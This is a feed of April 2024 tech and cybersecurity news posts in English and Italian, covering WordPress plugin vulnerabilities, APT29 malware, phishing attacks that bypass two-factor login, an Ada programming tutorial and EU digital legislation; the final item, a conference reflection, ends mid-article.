Cybersecurity & cyberwarfare

2024-04-23 17:00:00

Amazon Ends California Drone Deliveries While Expanding to Arizona

The outgoing MK27 drone used by Amazon today for deliveries. (Credit: Amazon)
When Amazon started its Prime Air drone delivery service in 2022, it had picked College Station (Texas) and Lockeford (California) as its the first areas where the service would be offered. Two years later, Amazon has now announced that it will be expanding to the West Valley of the Phoenix Metro area in Arizona from a new Tolleson center, while casually mentioning buried in the press release that the Lockeford area will no longer be serviced. No reason for this closure was provided, but as a quite experimental service drastic shifts can be expected as Amazon figures out what does and does not work.

Amazon Prime Air features custom drones that can transport packages up to 5 lbs (~2.27 kg) to its destination within an hour, if the item is listed as Prime Air capable for your area. Along with the change in service areas, Amazon is also testing its new MK30 drone (pictured, top), which should be much quieter due to a new propeller design and have twice the range of the old MK27 as well.

Even if flying drone delivery isn’t quite a blow-away success yet, Amazon doesn’t seem to be letting up on investing in it, and it could be argued that for certain items like medication or perishables, it does make a certain sense over traditional delivery and pick-up methods.

Cybersecurity & cyberwarfare

2024-04-23 16:43:31

250.000 siti WordPress a rischio compromissione. Aggiornate il plugin Forminator

Gli esperti JPCERT mettono in guardia su una serie di vulnerabilità critiche nel plugin Forminator per WordPress, sviluppato da WPMU DEV. Il plugin viene utilizzato su più di 500.000 siti e offre la possibilità di creare vari moduli senza troppe conoscenze di programmazione.

Di particolare preoccupazione è la vulnerabilità identificata da CVE-2024-28890 (punteggio CVSS: 9,8), che consente agli aggressori di caricare in remoto codice dannoso sui siti che utilizzano questo plugin. Ciò può portare alla fuga di informazioni riservate, alla modifica del contenuto del sito e persino alla completa negazione del servizio.

Inoltre, JPCERT segnala altri problemi di sicurezza, tra cui una vulnerabilità di tipo SQL injection ( CVE-2024-31077 con un punteggio di 7,2) e una vulnerabilità di cross-site scripting ( CVE-2024-31857 con un punteggio di 6,1). Tutti questi difetti consentono agli aggressori remoti di ottenere e modificare le informazioni dell’utente, oltre a causare guasti al sito.

Al momento sono già stati registrati attacchi che utilizzano la vulnerabilità CVE-2024-28890. Inoltre, le statistiche di WordPress.org mostrano che ora ci sono più di 500.000 installazioni attive del plugin, ma solo il 55,9% di esse è ora aggiornato alla versione 1.29, che risolve le vulnerabilità identificate. Cioè, circa 220mila siti rimangono ancora vulnerabili agli attacchi.

Gli sviluppatori consigliano agli amministratori del sito di aggiornare il plug-in all’ultima versione il prima possibile per proteggere le proprie risorse da possibili attacchi informatici.

È interessante notare che alla fine di agosto dello scorso anno il plugin Forminator è stato affetto dalla vulnerabilità CVE-2023-4596, che consentiva agli aggressori non autorizzati di caricare file dannosi su siti vulnerabili. Ora, 8 mesi dopo, la situazione si è ripetuta nuovamente.

L'articolo 250.000 siti WordPress a rischio compromissione. Aggiornate il plugin Forminator proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-23 15:30:12

An Elbow Joint That Can

We’re not certain whether [Paul Gould]’s kid’s prosthetic elbow joint is intended for use by a real kid or is part of a robotics project — but it caught our eye for the way it packs the guts of a beefy-looking motorized joint into such a small space.

At its heart is a cycloidal gearbox, in which the three small shafts which drive the center gear are driven by a toothed belt. The motive power comes from a brushless motor, which is what gives the build that impressive small size. He’s posted a YouTube short showing its internals and it doing a small amount of weight lifting, so it evidently has some pulling power.

If you’re interested in working with this design, it can be downloaded for 3D printing from Thingiverse. We think it could find an application in plenty of other projects, and we’d be interested to see what people do with it. There’s certainly a comparison to be maid over robotic joints which use wires for actuation.

https://www.youtube.com/embed/uMnrzvIZLBU?feature=oembed

Cybersecurity & cyberwarfare

2024-04-23 14:14:21

EU Parliament ratifies Right to Repair Directive

Members of the European Parliament (MEPs) voted in favour of the Right to Repair Directive on Tuesday (23 April), aimed at improving consumer access to repair services in order to reduce waste.

---

https://www.euractiv.com/section/digital/news/eu-parliament-ratifies-right-to-repair-directive/

Cybersecurity & cyberwarfare

2024-04-23 14:00:37

Programming Ada: First Steps on the Desktop

Who doesn’t want to use a programming language that is designed to be reliable, straightforward to learn and also happens to be certified for everything from avionics to rockets and ICBMs? Despite Ada’s strong roots and impressive legacy, it has the reputation among the average hobbyist of being ‘complicated’ and ‘obscure’, yet this couldn’t be further from the truth, as previously explained. In fact, anyone who has some or even no programming experience can learn Ada, as the very premise of Ada is that it removes complexity and ambiguity from programming.

In this first part of a series, we will be looking at getting up and running with a basic desktop development environment on Windows and Linux, and run through some Ada code that gets one familiarized with the syntax and basic principles of the Ada syntax. As for the used Ada version, we will be targeting Ada 2012, as the newer Ada 2022 standard was only just approved in 2023 and doesn’t change anything significant for our purposes.

Toolchain Things

The go-to Ada toolchain for those who aren’t into shelling out big amounts of money for proprietary, certified and very expensive Ada toolchains is GNAT, which at one point in time stood for the GNU NYU Ada Translator. This was the result of the United States Air Force awarding the New York University (NYU) a contract in 1992 for a free Ada compiler. The result of this was the GNAT toolchain, which per the stipulations in the contract would be licensed under the GNU GPL and its copyright assigned to the Free Software Foundation. The commercially supported (by AdaCore) version of GNAT is called GNAT Pro.

Obtaining a copy of GNAT is very easy if you’re on a common Linux distro, with the package gnat for Debian-based distros and gcc-ada if you’re Arch-based. For Windows you can either download the AdaCore GNAT Community Edition, or if you use MSYS2, you can use its package manager to install the mingw-w64-ucrt-x86_64-gcc-ada package for e.g. the new ucrt64 environment. My personal preference on Windows is the MSYS2 method, as this also provides a Unix-style shell and tools, making cross-platform development that much easier. This is also the environment that will be assumed throughout the article.

Hello Ada

The most important part of any application is its entry point, as this determines where the execution starts. Most languages have some kind of fixed name for this, such as main, but in Ada you are free to name the entry point whatever you want, e.g.:
with Ada.Text_IO;
procedure Greet is
begin
-- Print "Hello, World!" to the screen
Ada.Text_IO.Put_Line ("Hello, World!");
end Greet;
Here the entry point is the Greet procedure, because it’s the only procedure or function in the code. The difference between a procedure and a function is that only the latter returns a value, while the former returns nothing (similar to void in C and C++). Comments start with two dashes, and packages are imported using the with statement. In this case we want the Ada.Text_IO package, as it contains the standard output routines like Put_Line. Note that since Ada is case-insensitive, we can type all of those names in lower-case as well.

Also noticeable might be the avoidance of any symbols where an English word can be used, such as the use of is, begin and end rather than curly brackets. When closing a block with end, this is post-fixed with the name of the function or procedure, or the control structure that’s being closed (e.g. an if/else block or loop). This will be expanded upon later in the series. Finally, much like in C and C++ lines end with a semicolon.

For a reference of the syntax and much more, AdaCore has an online reference as well as a number of freely downloadable books, which include a comparison with Java and C++. The Ada Language Reference Manual (LRM) is also freely available.

Compile And Run

To compile the simple sample code above, we need to get it into a source file, which we’ll call greet.adb. The standard extensions with the GNAT toolchain are .adb for the implementation (body) and .ads for the specification (somewhat like a C++ header file). It’s good practice to use the same file name as the main package or entry point name (unit name) for the file name. It will work if not matched, but you will get a warning depending on the toolchain configuration.

Unlike in C and C++, Ada code isn’t just compiled and linked, but also has an intermediate binding step, because the toolchain fully determines the packages, dependencies, and other elements within the project before assembling the compiled code into a binary.

An important factor here is also that Ada does not work with a preprocessor, and specification files aren’t copied into the file which references them with a with statement, but only takes note of the dependency during compilation. A nice benefit of this is that include guards are not necessary, and headaches with linking such as link order of objects and libraries are virtually eliminated. This does however come at the cost of dealing with the binder.

Although GNAT comes with individual tools for each of these steps, the gnatmake tool allows the developer to handle all of these steps in one go. Although some prefer to use the AdaCore-developed gprbuild, we will not be using this as it adds complexity that is rarely helpful. To use gnatmate to compile the example code, we use a Makefile which produces the following output:
mkdir -p bin
mkdir -p obj
gnatmake -o bin/hello_world greet.adb -D obj/
gcc -c -o obj\greet.o greet.adb
gnatbind -aOobj -x obj\greet.ali
gnatlink obj\greet.ali -o bin/hello_world.exe
Although we just called gnatmake, the compilation, binding and linking steps were all executed subsequently, resulting in our extremely sophisticated Hello World application.

For reference, the Makefile used with the example is the following:
GNATMAKE = gnatmake
MAKEDIR = mkdir -p
RM = rm -f

BIN_OUTPUT := hello_world
ADAFLAGS := -D obj/

SOURCES := greet.adb

all: makedir build

build:
$(GNATMAKE) -o bin/$(BIN_OUTPUT) $(SOURCES) $(ADAFLAGS)

makedir:
$(MAKEDIR) bin
$(MAKEDIR) obj

clean:
rm -rf obj/
rm -rf bin/

.PHONY: test src

Next Steps

Great, so now you have a working development environment for Ada with which you can build and run any code that you write. Naturally, the topic of code editors and IDEs is one can of flamewar that I won’t be cracking open here. As mentioned in my 2019 article, you can use AdaCore’s GNAT Programming Studio (GPS) for an integrated development environment experience, if that is your jam.

My own development environment is a loose constellation of Notepad++ on Windows, and Vim on Windows and elsewhere, with Bash and similar shells the environment for running the Ada toolchain in. If there is enough interest I’d be more than happy to take a look at other development environments as well in upcoming articles, so feel free to sound off in the comments.

For the next article I’ll be taking a more in-depth look at what it takes to write an Ada application that actually does something useful, using the preparatory steps of this article.

Cybersecurity & cyberwarfare

2024-04-23 14:07:47

Hacker di Anonymous attaccano le Forze di Difesa Israeliane: 233.000 documenti militari compromessi

A seguito di un sospetto attacco informatico da parte di un gruppo di hacker associato al collettivo Anonymous, le Forze di difesa israeliane (IDF) si trovano ad affrontare accuse secondo cui dati sensibili sono stati compromessi.

Secondo gli hacker hanno avuto accesso a 20 gigabyte di informazioni, tra cui più di 233.000 documenti militari in vari formati, tra cui file PDF, documenti Word e presentazioni.

Il Dipartimento della Difesa, al contrario, nega l’hacking e sottolinea che i loro sistemi informatici sono sicuri a più livelli e difficilmente sono stati compromessi direttamente. E se è avvenuto qualche tipo di hacking, molto probabilmente si è trattato di sistemi civili.

Gli hacker hanno pubblicato un video che mostra frammenti apparentemente reali di presentazioni dell’IDF, ma l’agenzia lo vede come un possibile elemento di guerra psicologica, mettendo in dubbio l’autenticità dei materiali.

All’inizio di questo mese, lo stesso gruppo avrebbe effettuato un attacco informatico all’infrastruttura informatica del Ministero della Giustizia israeliano, sostenendo che i membri del gruppo sarebbero riusciti a penetrare nei sistemi di sicurezza del dipartimento e a scaricare più di 300 gigabyte di dati. Secondo gli hacker, i dati contengono 8 milioni di file, comprese informazioni personali sensibili.

Le motivazioni del gruppo rimangono poco chiare, ma alcuni dei suoi membri hanno espresso sentimenti anti-israeliani, che potrebbero collegare l’attacco a un programma geopolitico più ampio.

Può anche darsi che non ci sia stata davvero alcuna compromissione. Abbiamo già visto una strategia simile il mese scorso con il gruppo Mogilevich, che ha semplicemente diffuso una serie di voci secondo cui avrebbe presumibilmente violato diverse grandi aziende.

Secondo il Jerusalem Post, l’agenzia informatica nazionale aveva precedentemente lanciato un avvertimento riguardo a un’ondata di attacchi informatici post-Ramadan contro l’infrastruttura online israeliana, inclusi siti Web, sistemi digitali e fughe di dati sensibili. Inoltre, gli hacker possono utilizzare programmi di sorveglianza e tentare di accedere illegalmente a sistemi a scopo di spionaggio o sabotaggio.

L'articolo Hacker di Anonymous attaccano le Forze di Difesa Israeliane: 233.000 documenti militari compromessi proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-23 11:02:16

EU Parliament overwhelmingly approves key telecoms regulation: price reductions down the road

The European Parliament approved on Tuesday (23 April) the EU’s broadband act, the Gigabit Infrastructure Act (GIA), which aims to accelerate the deployment of high-capacity networks and reduce prices for consumers

---

https://www.euractiv.com/section/digital/news/eu-parliament-overwhelmingly-approves-key-telecoms-regulation-price-reductions-down-the-road/

Cybersecurity & cyberwarfare

2024-04-23 11:30:49

Emails reveal how Bolt tried to shape Estonia’s opposition to gig work directive

In October 2023, mobility company Bolt, headquartered in Estonia, offered to draft a letter on behalf of the Estonian government to push back against the platform work directive — liaising directly with a government official who is a former Bolt employee.

---

https://www.euractiv.com/section/gig-economy/news/emails-reveals-how-bolt-tried-to-shape-estonias-position-on-gig-work-directive/

Cybersecurity & cyberwarfare

2024-04-23 11:00:16

Your Smart TV Does 4K, Surround Sound, Denial-of-service…

Any reader who has bought a TV in recent years will know that it’s now almost impossible to buy one that’s just a TV. Instead they are all “smart” TVs, with an on-board computer running a custom OS with a pile of streaming apps installed. It fits an age in which linear broadcast TV is looking increasingly archaic, but it brings with it a host of new challenges.

Normally you’d expect us to launch into a story of privacy invasion from a TV manufacturer at this point, but instead we’ve got [Priscilla]’s experience, in which her HiSense Android TV executed a denial of service on the computers on her network.

The root of the problem appears to be the TV running continuous network discovery attempts using random UUIDs, which when happening every few minutes for a year or more, overloads the key caches on other networked machines. The PC which brought the problem to light was a Windows machine, which leaves us sincerely hoping that our Linux boxen might be immune.

It’s fair to place this story more under the heading of bugs than of malicious intent, but even so it’s something that should never have made it to production. The linked story advises nobody to buy a HiSense TV, but to that we’d have to doubt that other manufactures wouldn’t be similarly affected.

Header: William Hook, CC-BY-SA 2.0.

Thanks [Concretedog] for the tip.

Cybersecurity & cyberwarfare

2024-04-23 09:56:07

Minacce nell’era digitale: Analisi degli attacchi ‘Man in the Middle’ e ‘Adversary in the Middle’

In un’era di crittografia avanzata, che rende le tecniche tradizionali di intercettazione meno efficaci, i cyberattacchi si evolvono diventando sempre più sofisticati e insidiosi. Tra questi, due varianti particolarmente preoccupanti per le transazioni finanziarie nel settore commerciale sono il noto attacco “Man in the Middle” (MitM), e l’ “Adversary in the Middle” (AiTM), una minaccia ancora più avanzata che utilizza tecniche di phishing o malware per compromettere la comunicazione, spesso attraverso l’uso di proxy indiretti.

Come funzionano i più recenti attacchi Man in the Middle

Questa minaccia inizia con un’operazione di spear phishing mirata o con l’exploit di una vulnerabilità del software all’interno di un sistema di posta elettronica aziendale. Una volta ottenuto l’accesso, un attaccante malintenzionato utilizza tecniche avanzate per eludere i filtri antispam e antimalware, inserendo regole di inoltro clandestine o creando regole automatizzate che reindirizzano le comunicazioni aziendali rilevanti ai server controllati dall’utente malintenzionato.

La fase critica di questo schema si verifica quando sono coinvolte transazioni finanziarie. Gli aggressori, ora in possesso di informazioni aziendali sensibili, possono creare una documentazione falsa che è quasi indistinguibile da quella autentica. Modificano l’IBAN nei dettagli di pagamento o nelle fatture, dirottando così i fondi aziendali sui loro conti.

Gli attacchi AiTM con proxy indiretto: una minaccia silenziosa ma devastante

Al centro di questa nuova ondata di truffe digitali vi è la capacità dei cybercriminali di bypassare l’autenticazione a due fattori (2FA), specialmente quelle basate su SMS o OTP. Tramite l’uso di sofisticati kit di phishing disponibili su piattaforme di phishing-as-a-service (PhaaS), i truffatori hanno perfezionato l’arte di orchestrare attacchi mirati con precisione chirurgica. Questi attacchi, utilizzando la tecnica nota come Adversary-in-the-Middle con proxy indiretto, riescono a intercettare credenziali di accesso e token 2FA, vanificando di fatto le misure di sicurezza predisposte per proteggere gli account.

L’attacco ha inizio con l’invio di email fraudolente che mimano la provenienza da entità affidabili, in questo caso il servizio di assistenza di un gestore di posta elettronica indirizzando le vittime verso link malevoli. Questi ultimi conducono a pagine di phishing che replicano con estrema fedeltà le interfacce di login ufficiali del gestore della mail. Gli utenti, credendo di accedere ai propri account, inseriscono le loro credenziali e il codice 2FA, consegnando involontariamente ai truffatori il pieno controllo sui loro account.

Gli aggressori spesso ospitano i siti truffaldini su servizi cloud per la loro affidabilità e scalabilità. Strategie come l’uso di Fast Flux networks (che nascondono l’indirizzo IP di un server dietro a una rete di host veloci e in continua modifica) o Domain Generation Algorithms (DGA, che generano automaticamente un gran numero di nomi di dominio), complicano il rilevamento e la chiusura di questi siti da parte delle autorità.

Il ruolo dei cookie di sessione

I cookie di sessione sono piccoli file di testo che un sito web invia al browser dell’utente. Questi file sono fondamentali per mantenere uno stato tra le pagine e le visite successive. In una sessione di navigazione normale, i cookie memorizzano informazioni utili come preferenze dell’utente o dettagli di autenticazione, consentendo agli utenti di navigare senza dover inserire ripetutamente le loro credenziali.

Nel contesto di un attacco AiTM con proxy indiretto, i cookie acquisiscono un’importanza cruciale. Dopo aver ingannato una vittima inducendola a inserire le credenziali in una pagina di phishing, gli attaccanti non solo catturano username e password, ma intercettano anche i cookie di sessione.

Questo consente agli aggressori di mantenere l’accesso al servizio facendosi passare per gli utenti legittimi, agevolando azioni malevole come il furto di dati, l’accesso non autorizzato a risorse sensibili e la manipolazione di transazioni. Tra queste azioni rientra anche il “session hijacking”, un’operazione in cui l’attaccante sfrutta il cookie di sessione rubato per impersonare la vittima.

Misure preventive e buone pratiche

Data la sofisticatezza di questi attacchi, è essenziale adottare misure di difesa altrettanto avanzate:

• Formazione del personale: Educare il personale a riconoscere le tecniche di phishing e le pratiche di sicurezza delle email.
• Controlli di sicurezza a doppio livello: Utilizzare canali di comunicazione secondari per confermare l’autenticità delle richieste prima di effettuare pagamenti o modifiche significative ai dettagli della transazione.
• Audit regolari e monitoraggio continuo: Verificare regolarmente le regole di inoltro e filtraggio delle email per individuare eventuali anomalie.
• Collaborazione con clienti e fornitori: Stabilire protocolli di sicurezza condivisi e standard di verifica con i partner commerciali per creare un ecosistema di sicurezza collettivo.
• Autenticazione avanzata: Utilizzare metodi di MFA più robusti, come le notifiche push o i token hardware (es. FIDO2).
• Monitoraggio del traffico: Analizzare costantemente il traffico di rete per identificare schemi anomali che potrebbero indicare un attacco in corso.
• Aggiornamento continuo dei sistemi.
• Misure preventive per la sicurezza dei cookie:
  
  • Flag Secure: Assicurarsi che i cookie vengano inviati solo su connessioni HTTPS.
  • Flag HttpOnly: Impedire l’accesso ai cookie tramite script lato client per ridurre i rischi di attacchi XSS.
  • Flag SameSite: Limitare l’invio di cookie in richieste cross-origin per prevenire attacchi.
  • Politiche di scadenza dei cookie: Definire scadenze appropriate per i cookie, limitando il tempo durante il quale sono validi e riducendo così la finestra di opportunità per gli attacchi.

  
  

Conclusione

Le implicazioni di tali attacchi vanno oltre la semplice perdita finanziaria. Possono compromettere relazioni commerciali di lunga data, danneggiare la reputazione e causare interruzioni significative nella catena di approvvigionamento. Ecco perché è fondamentale non solo rilevare, ma anche prevenire attivamente questi attacchi. Gli attacchi “Man in the Middle” e “Adversary in the Middle” con proxy indiretto rappresentano minacce significative che sfruttano le vulnerabilità sia umane che tecnologiche per compromettere dati sensibili e dirottare fondi. Questi attacchi, che eludono le misure di sicurezza tradizionali e avanzate, come l’autenticazione multi-fattore, richiedono una risposta coordinata che combini tecnologie all’avanguardia, rigorose politiche di sicurezza e un impegno continuo nella formazione degli utenti. Solo attraverso la vigilanza, l’innovazione costante in tecniche di difesa e la collaborazione tra le organizzazioni si può sperare di mitigare il rischio di queste sofisticate minacce informatiche, proteggendo così l’integrità finanziaria e la fiducia dei clienti nelle istituzioni finanziarie.

L'articolo Minacce nell’era digitale: Analisi degli attacchi ‘Man in the Middle’ e ‘Adversary in the Middle’ proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-23 08:41:39

Il gruppo APT29 colpisce Windows con un malware backdoor attraverso lo spooler di stampa

Negli ultimi anni, i professionisti della sicurezza hanno osservato un aumento degli attacchi informatici contro organizzazioni nell’Europa orientale e occidentale, nonché nel Nord America. Ciò è dovuto agli hacker del gruppo APT29, che sfruttano attivamente le vulnerabilità dei sistemi di sicurezza.

I ricercatori Microsoft hanno identificato l’utilizzo da parte del gruppo di un nuovo tipo di malware chiamato GooseEgg che utilizza un bug nel componente Spooler di stampa di Windows, che è stato ufficialmente corretto nell’ottobre 2022.

La vulnerabilità, nota come CVE-2022-38028 ha un punteggio CVSS di 7,8 e consente privilegi elevati sul sistema. Utilizzando il malware GooseEgg, gli aggressori lanciano programmi con diritti elevati, il che rende loro più semplice diffondere ulteriormente malware e installare backdoor.

Secondo gli esperti, le azioni di APT29 si concentrano spesso sulla raccolta di informazioni. GooseEgg, sebbene sia una semplice applicazione di avvio, supporta vari comandi per attivare vulnerabilità ed eseguire codice dannoso.

Il gruppo è stato recentemente visto anche sfruttare le vulnerabilità in Microsoft Outlook e WinRAR per l’escalation dei privilegi e l’esecuzione di codice, evidenziando la loro capacità di integrare rapidamente exploit pubblici nelle loro operazioni.

Per proteggersi dagli attacchi APT29, Microsoft consiglia di eliminare la vulnerabilità dello spooler di stampa se ciò non è stato fatto dopo il rilascio della patch, e anche di aumentare attivamente i meccanismi di protezione all’interno dell’organizzazione.

L'articolo Il gruppo APT29 colpisce Windows con un malware backdoor attraverso lo spooler di stampa proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-23 08:00:00

Reverse Engineering the Quansheng Hardware

In the world of cheap amateur radio transceivers, the Quansheng UV-K5 can’t be beaten for hackability. But pretty much every hack we’ve seen so far focuses on the firmware. What about the hardware?

To answer that question, [mentalDetector] enlisted the help of a few compatriots and vivisected a UV-K5 to find out what makes it tick. The result is a (nearly) complete hardware description of the radio, including schematics, PCB design files, and 3D renders. The radio was a malfunctioning unit that was donated by collaborator [Manuel], who desoldered all the components and measured which ones he could to determine specific values. The parts that resisted his investigations got bundled up along with the stripped PCB to [mentalDetector], who used a NanoVNA to characterize them as well as possible. Documentation was up to collaborator [Ludwich], who also made tweaks to the schematic as it developed.

PCB reverse engineering was pretty intense. The front and back of the PCB — rev 1.4, for those playing along at home — were carefully photographed before getting the sandpaper treatment to reveal the inner two layers. The result was a series of high-resolution photos that were aligned to show which traces connected to which components or vias, which led to the finished schematics.

There are still a few unknown components, mostly capacitors by the look of it, but the bulk of the work has been done, and hats off to the team for that. This should make hardware hacks on the radio much easier, and we’re looking forward to what’ll come from this effort. If you want to check out some of the firmware exploits that have already been accomplished on this radio, check out the Trojan Pong upgrade, or the possibilities of band expansion. We’ve also seen a mixed hardware-firmware upgrade that really shines.

Cybersecurity & cyberwarfare

2024-04-23 07:59:28

Come le soluzioni EDR possono essere utilizzate dagli hacker come armi

Lo specialista di SafeBreach Shmuel Cohen ha dimostrato che le soluzioni EDR possono essere utilizzate come strumenti di attacco. Durante lo studio, Cohen ha analizzato uno dei sistemi EDR, identificando le vulnerabilità che potrebbero consentire agli hacker di utilizzare tale strumento a scopo dannoso.

I sistemi EDR eseguiti con privilegi elevati sono progettati per proteggere i dispositivi da varie minacce, incluso il malware. Tuttavia, la compromissione di tali sistemi può fornire agli aggressori un accesso persistente e non rilevabile ai dispositivi delle vittime.

Cohen ha scoperto che il comportamento dell’EDR sotto indagine gli consentiva di aggirare la protezione dalla modifica dei file, consentendogli di eseguire software di crittografia ransomware e persino di caricare un driver vulnerabile per impedire la rimozione dell’EDR utilizzando una password di amministratore.

Inoltre, il ricercatore ha trovato un modo per iniettare codice dannoso in uno dei processi EDR, consentendo al codice di essere eseguito con privilegi elevati e di non essere rilevato. Cohen ha anche sfruttato la capacità di modificare i file Lua e Python, rendendo possibile l’esecuzione di codice dannoso e l’accesso alla macchina con i più alti privilegi di sistema.

Usando un driver vulnerabile, Cohen poteva leggere e scrivere nel kernel del sistema, permettendogli di modificare i controlli della password di controllo di EDR per consentire l’uso di qualsiasi password, o addirittura bloccare la disinstallazione del programma se era disconnesso dal server di controllo.

Lo studio evidenzia che gli attacchi alle soluzioni EDR possono fornire agli aggressori potenti funzionalità che probabilmente non verranno rilevate. Cohen osserva che i prodotti di sicurezza devono proteggere attentamente la logica dei processi di rilevamento, crittografare e firmare digitalmente i file di contenuto per impedirne la manomissione. Dovresti anche aggiungere processi agli elenchi consentiti o negati in base a diversi parametri che un utente malintenzionato non dovrebbe essere in grado di modificare.

Palo Alto Networks ha risposto alla scoperta di Cohen aggiornando i propri meccanismi di sicurezza e consigliando agli utenti di assicurarsi che i loro sistemi fossero aggiornati. Cohen ha condiviso la sua ricerca con il pubblico per aumentare la consapevolezza su tali minacce e rafforzare le misure di sicurezza nelle organizzazioni.

L'articolo Come le soluzioni EDR possono essere utilizzate dagli hacker come armi proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-23 06:03:34

FISA Emendament Act sezione 702. Gli Stati Uniti continueranno a monitorare il mondo!

Dopo un aspro dibattito durato fino alle prime ore di sabato mattina, il Congresso degli Stati Uniti ha votato per prorogare di due anni la Sezione 702 del Foreign Intelligence Surveillance Act (FISA).

Questo programma consente alle agenzie di intelligence statunitensi di intercettare i dati delle comunicazioni di stranieri all’estero senza mandato, anche se stanno negoziando con cittadini statunitensi.

Il Senato ha approvato la proroga con un margine di 60 voti favorevoli e 34 contrari.

Il leader della maggioranza democratica Chuck Schumer ha definito la mossa necessaria per la sicurezza nazionale. La scorsa settimana anche la Camera dei Rappresentanti ha votato a favore, nonostante l’appello dell’ex presidente Donald Trump sui social media a “seppellire” il disegno di legge.

La legge, approvata per la prima volta nel 2008 e da allora ampliata più volte, consente alla Nationl Security Agency NSA di ottenere dati su individui stranieri all’estero per scopi di intelligence senza un mandato da parte delle società tecnologiche statunitensi. Circa il 3% di queste informazioni viene trasmesso all’FBI.

Naturalmente al programma 702 viene criticato soprattutto il fatto che durante le intercettazioni i messaggi degli americani possono essere intercettati. Ecco perché da anni i sostenitori delle libertà civili di entrambi i partiti chiedono maggiori regolamentazioni.

Alla Camera dei Rappresentanti, con un drammatico voto 212-212, un emendamento che richiedeva un ordine del tribunale per accedere ai dati dei cittadini raccolti nell’ambito del programma 702 è stato respinto. Una proposta simile del senatore Dick Durbin è fallita per uno stretto margine. Altri cinque emendamenti meno ambiziosi sono stati successivamente respinti.

I funzionari dell’intelligence spingono da tempo affinché la legge venga estesa, sostenendo che la sua conclusione metterebbe a rischio molte vite. Il programma ha contribuito a contrastare un attacco terroristico su un sito di infrastrutture critiche lo scorso anno e a scoprire un attacco informatico cinese su un hub di trasporto statunitense, ha affermato il direttore dell’FBI Christopher Wray.

È interessante notare che nel 2022, il tribunale, che sovrintende alle agenzie di intelligence, ha identificato più di 278mila casi in cui l’FBI ha abusato dei termini della legge tra il 2020 e l’inizio del 2021. L’ufficio di presidenza ha chiesto, tra l’altro, dati sugli sponsor del deputato, sui partecipanti all’assalto al Campidoglio del 6 gennaio e sui manifestanti contro l’uccisione di George Floyd. Tuttavia, non c’era motivo di credere che queste informazioni fossero legate ad attività di intelligence.

Ora l’FBI ha rafforzato le sue procedure. Gli analisti devono giustificare in modo indipendente la rilevanza delle domande e gli avvocati devono approvare le ricerche di massa di ampi gruppi di persone. Tuttavia, la nuova edizione del documento ha ampliato la gamma delle aziende tenute a collaborare con le autorità. Ora questo vale non solo per le società di telecomunicazioni, ma anche per “qualsiasi altro fornitore di servizi” con accesso alle apparecchiature per la trasmissione e l’archiviazione dei dati di comunicazione, ovvero l’archiviazione nel cloud.

I difensori della privacy hanno aspramente criticato la mossa definendola una “misura orwelliana” che consentirebbe al governo di monitorare le comunicazioni private dei cittadini.

Tuttavia, uno degli autori dell’emendamento, il deputato Jim Himes, insiste sul fatto che esso ha un focus strettamente tecnico e non avrà ripercussioni sulla gente comune. Tuttavia, è probabile che il dibattito sull’equilibrio tra sicurezza nazionale e diritti alla privacy continui.

L'articolo FISA Emendament Act sezione 702. Gli Stati Uniti continueranno a monitorare il mondo! proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-23 05:30:26

Lungimiranti: gli “uomini straordinari” ospiti della Red Hot Cyber Conference 2024

Sono le 22:48 del 21 aprile 2024, sono passate più di 24 ore dalla fine della Conferenza di Red Hot Cyber a Roma e mentre sto guidando per tornare a casa dopo una bellissima giornata passata in famiglia, penso a cosa posso raccontarvi. Penso che dovrei iniziare con il dirvi che domenica ho potuto intervistare delle persone fantastiche e che non vedo l’ora che le ascoltiate anche voi.

La prima cosa che vi racconterò di loro è quella profonda passione che mettono nel lavoro che li vede impegnati nella difesa del nostro Paese, gliela potete leggere negli occhi. Non solo, nelle loro risposte potrete comprendere le loro grandi doti di lungimiranza, necessaria per prevedere gli imprevisti e pianificarne la gestione per prevenire l’inevitabile. Quanto amo il mio Paese. Lo capisco quando li ascolto, quando mi spiegano che gli italiani nel mondo hanno ruoli di grandissima responsabilità, ma non solo nel mondo, anche qui, oggi e adesso.

Mentre penso a tutto questo due abbaglianti mi accecano dallo specchietto retrovisore. Mi trovo su una tangenziale, mantengo il limite di velocità di 70 km orari e la linea è continua. La macchina dietro è a poco meno di due metri di distanza da me, poi, dopo qualche chilometro, prende il coraggio e mi supera, io sospiro, ma chi viene dal senso opposto ha avuto la stessa idea. E mi viene in mente che le politiche di sicurezza sono tanto forti quanto il loro anello più debole. Il comportamento umano infatti è il fattore più sensibile e ancora oggi non è del tutto prevedibile.

Certo, se riuscissimo ad avere tutte le informazioni sulla sua natura e sulle motivazioni del comportamento, probabilmente riusciremo ad essere più accurati nel prevedrlo, ma poi naturalmente subentrerebbero altre importanti questioni come: se un comportamento fosse prevedibile potrebbe essere anche manipolabile? Poi arriveremo alle questioni etiche, ad esempio se qualcuno sia o meno veramente responsabile delle proprie azioni.
Rimane il fatto che controllare il nostro comportamento nel rispetto delle regole e della sicurezza altrui è fondamentale. Questo però non accade solo sulla strada ma anche sul nostro computer. La sicurezza è una grande responsabilità, per tutti, in tutti i campi della vita ed è anche soprattutto un lavoro di squadra e non una battaglia in solitaria. Questo Red Hot Cyber lo ha sempre saputo e lo ha sempre messo in pratica al suo interno.

Soprattutto lo hanno messo in pratica i ragazzi che si sono messi alla prova con il Capture The Flag (CTF) nella giornata di sabato: per aver successo i team devono infatti lavorare insieme per identificare e sfruttare le vulnerabilità del sistema e per fare questo, potrebbero dover utilizzare una varietà di competenze e tecniche, come l’analisi di rete, il reverse engineering o la crittografia. Devono anche avere una buona comunicazione e coordinamento tra loro e difendere i propri sistemi da eventuali attacchi. Soprattutto ancora prima che tutto inizi devono leggere le regole e cercare di non trasgredirle.

Sulle spalle dei giganti si vede più lontano

